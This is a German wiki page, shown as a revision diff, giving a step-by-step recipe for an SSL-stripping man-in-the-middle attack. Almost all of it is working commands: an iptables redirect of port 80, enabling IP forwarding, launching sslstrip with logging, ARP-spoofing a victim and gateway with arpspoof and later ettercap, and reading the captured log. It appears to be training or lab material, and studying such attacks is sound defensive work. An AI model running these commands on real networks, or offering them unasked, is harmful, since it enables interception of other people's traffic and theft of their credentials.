Ssl strip anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 11: Zeile 11:
  
 
=arpspoofing=
 
=arpspoofing=
*$OPFER=10.0.10.101
+
*$HOST1=10.0.10.102
*$ZIEL=10.0.10.1
+
*$HOST2=10.0.10.10
*arpspoof  -i eth0 -t $OPFER -r $ZIEL
+
*ettercap -Tq -i eth0 -M arp /$HOST1,$HOST2// /$HOST2,$HOST1//
  
 
=log=
 
=log=
 
*cat sslstrip.log
 
*cat sslstrip.log

Version vom 13. August 2021, 08:07 Uhr

Vorbermerkung

Da python2 als obsolet gilt muss sslstrip auf einem älteren System laufen.

nat prerouting

  • iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

forwarding

  • echo 1 > /proc/sys/net/ipv4/ip_forward

sslstrip starten

  • sslstrip -a -f -k -w sslstrip.log

arpspoofing

  • $HOST1=10.0.10.102
  • $HOST2=10.0.10.10
  • ettercap -Tq -i eth0 -M arp /$HOST1,$HOST2// /$HOST2,$HOST1//

log

  • cat sslstrip.log